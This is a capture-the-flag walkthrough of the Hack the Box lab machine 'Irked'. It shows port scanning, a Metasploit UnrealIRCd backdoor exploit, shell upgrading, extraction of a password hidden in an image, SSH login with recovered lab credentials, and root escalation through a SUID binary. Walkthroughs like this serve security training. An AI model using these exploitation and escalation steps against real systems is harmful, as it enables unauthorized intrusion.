Hack the Box – Irked Walkthrough

Today, we’re going to solve another CTF machine “Irked”. It is now retired box and can be accessible to VIP member.

Specifications

  • Target OS: Linux
  • IP Address: 10.10.10.117
  • Difficulty: Easy

Contents

  • Getting user
  • Getting root

Reconnaissance

As always, the first step consists of reconnaissance phase as port scanning.

Ports Scanning

During this step we’re gonna identify the target to see what we have behind the IP Address.

nmap -p 1-65535 -T4 -A -v -oA intense-tcp 10.10.10.117

22/tcp open ssh OpenSSH 6.7p1 Debian 5+deb8u4 (protocol 2.0) | ssh-hostkey: | 1024 6a:5d:f5:bd:cf:83:78:b6:75:31:9b:dc:79:c5:fd:ad (DSA) | 2048 75:2e:66:bf:b9:3c:cc:f7:7e:84:8a:8b:f0:81:02:33 (RSA) | 256 c8:a3:a2:5e:34:9a:c4:9b:90:53:f7:50:bf:ea:25:3b (ECDSA) |_ 256 8d:1b:43:c7:d0:1a:4c:05:cf:82:ed:c1:01:63:a2:0c (EdDSA) 80/tcp open http Apache httpd 2.4.10 ((Debian)) | http-methods: |_ Supported Methods: POST OPTIONS GET HEAD |_http-server-header: Apache/2.4.10 (Debian) |http-title: Site doesn’t have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100024 1 53832/tcp status | 100024 1 58245/udp status 6697/tcp open irc UnrealIRCd 8067/tcp open irc UnrealIRCd 53832/tcp open status 1 (RPC #100024) 65534/tcp open irc UnrealIRCd

Enumeration

Let’s browse URL http://10.10.10.117/

If we take a look at view-source:http://10.10.10.117/ we found nothing but and image.

Steganography

Let’s wget irked.jpg and enumerate for hidden information inside image.

xxd irked.jpg strings irked.jpg

If we try to extract information with steghide it requires password which is odd.

steghide extract -sf irked.jpg

Let’s keep this aside for now and move ahead.

Exploitation

The nmap scan revels we have UnrealIRCd installed let’s find out which version is it. We can connect to IRC using HexChat and see the response.

It reveled version 3.2.8.1 for UnrealIRCd.

Let’s searchsploit unrealircd and see if there’s any exploit available for this version.

We have bunch of exploits let’s test them.

Metasploit

Let’s fire up msfconsole and search unreal

msf5 > use exploit/unix/irc/unreal_ircd_3281_backdoor msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rhosts 10.10.10.117 rhosts => 10.10.10.117 msf5 exploit(unix/irc/unreal_ircd_3281_backdoor) > set rport 6697 rport => 6697

Now let’s exploit and see magic.

We have a restricted shell let’s upgrade our shell using python.

python -c 'import pty; pty.spawn("/bin/bash")'export TERM=xterm

We found user.txt flag inside /home/djmardov/Documents but don’t have permission to read it.

ircd@irked:/home/djmardov/Documents$ pwd pwd /home/djmardov/Documents ircd@irked:/home/djmardov/Documents$ ls -la ls -la total 16 drwxr-xr-x 2 djmardov djmardov 4096 May 15 2018 . drwxr-xr-x 18 djmardov djmardov 4096 Nov 3 04:40 … -rw-r–r-- 1 djmardov djmardov 52 May 16 2018 .backup -rw------- 1 djmardov djmardov 33 May 15 2018 user.txt ircd@irked:/home/djmardov/Documents$ wc -c user.txt wc -c user.txt wc: user.txt: Permission denied

For that we have to spawn our shell as djmardov user to read our flag but if you take a look at .backup file we have read permission.

ircd@irked:/home/djmardov/Documents$ cat .backup cat .backup Super elite steg backup pw UPupDOWNdownLRlrBAbaSSss

It says steg backup password since we found and irked.jpg image and it was password protected we can try extracting information using this password.

Steghide extracted a pass.txt file successfully and it contains another password.

Kab6h+m+bbp2J:HG

We can assume that it’s an SSH password for djmardov because we had SSH port opened. let’s try our luck.

root@m4sterph0enix:~# ssh djmardov@10.10.10.117 djmardov@10.10.10.117’s password: Kab6h+m+bbp2J:HG djmardov@irked:~$

Now, we can successfully read user.txt flag.

Privilege Escalation

We can use scripts to find odd things or we could just manually enumerate for things.

Let’s get started!

djmardov@irked:~$ sudo -l -bash: sudo: command not found

Let’s find which services and applications are running or to find something interesting.

ps aux | grep root ps -ef | grep root

Let’s find SUID files.

find / -perm -u=s -type f 2>/dev/null

OR

find / -perm -u=s -type f -maxdepth 6 -exec ls -ld {} ; 2>/dev/null

This file /usr/bin/viewuser seems odd because it’s recently modified.

djmardov@irked:~# /usr/bin/viewuser This application is being devleoped to set and test user permissions It is still being actively developed (unknown) :0 2019-04-28 22:35 (:0) djmardov pts/2 2019-05-04 05:58 (10.10.14.6)

Now if we execute /usr/bin/viewuser it will run our /tmp/listusers opening a shell as root, because viewuser was being executed as root.

And we got root flag.

root@irked:~# id uid=0(root) gid=1000(djmardov) groups=1000(djmardov),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),108(netdev),110(lpadmin),113(scanner),117(bluetooth) root@irked:~# wc -c /root/root.txt 33 /root/root.txt